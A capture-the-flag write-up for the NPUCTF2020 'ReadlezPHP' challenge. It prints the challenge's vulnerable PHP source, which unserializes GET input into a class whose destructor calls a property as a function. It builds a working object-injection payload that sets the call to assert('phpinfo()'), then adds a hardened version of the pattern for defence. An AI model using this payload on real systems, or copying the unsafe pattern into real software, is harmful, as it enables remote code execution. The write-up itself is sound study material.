NPUCTF2020ReadlezPHP

The page is completely black.
Viewing the page source reveals another page, /time.php?source,
which hands over the source code:

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        // Dynamic call: the function name and its argument both come from object properties
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

// User-controlled input is deserialized directly
@$ppp = unserialize($_GET["data"]);
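
An old acquaintance: deserialization.
@$ppp = unserialize($_GET["data"]); is where the parameter is passed in.
Because of $b($a), PHP's dynamic function call can be used to get the flag.
This needs the assert() function, so that the call becomes:

assert(phpinfo())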


Build the serialized object as follows (using phpstudy):

<?php
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "phpinfo()";
        $this->b = "assert";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp();
var_dump(serialize($c));
?>

Output: O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}
Payload: ?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";} and that does it.
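
The defensive counterpart to the challenge code, as an added example that is not part of the original write-up or the challenge source: untrusted input is decoded with `allowed_classes` set to false so no destructor runs, and the callable is checked against an allowlist instead of being invoked as `$b($a)`. `SafeHelloPhp`, `ALLOWED_FORMATTERS` and `load_untrusted()` are hypothetical names; PHP 7.1 or later is assumed.

```php
<?php
// Added example: hardened variant of the HelloPhp pattern (hypothetical names).

final class SafeHelloPhp
{
    // Only callables on this list may ever be invoked through $b.
    private const ALLOWED_FORMATTERS = ['date', 'gmdate'];

    public $a = 'Y-m-d h:i:s';
    public $b = 'date';

    // Explicit method instead of doing work in __destruct().
    public function render(): string
    {
        // Strict allowlist check replaces the unchecked $b($a) call.
        if (!is_string($this->a) || !in_array($this->b, self::ALLOWED_FORMATTERS, true)) {
            throw new InvalidArgumentException('formatter not allowed');
        }
        return ($this->b)($this->a);
    }

    // Refuse to be rebuilt from serialized bytes at all.
    public function __wakeup(): void
    {
        throw new LogicException('SafeHelloPhp must not be unserialized');
    }
}

// Decode untrusted input without instantiating any class: objects come back as
// __PHP_Incomplete_Class, so no __destruct() or __wakeup() of application classes runs.
function load_untrusted(string $data)
{
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value === false || is_object($value)) {
        return null; // reject malformed input and any top-level object
    }
    return $value;
}

// Constructed sample inputs: the serialized object from this write-up, then a plain array.
$payload = 'O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}';
var_dump(load_untrusted($payload));               // object input is rejected
var_dump(load_untrusted('a:1:{i:0;s:2:"ok";}'));  // scalar/array data passes through

// Even with direct property access, a non-allowlisted callable is refused.
$obj = new SafeHelloPhp();
$obj->b = 'assert';
try { $obj->render(); } catch (InvalidArgumentException $e) { echo $e->getMessage(), "\n"; }
```

Where the data only needs to carry scalars and arrays, `json_decode()` avoids PHP object deserialization entirely.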
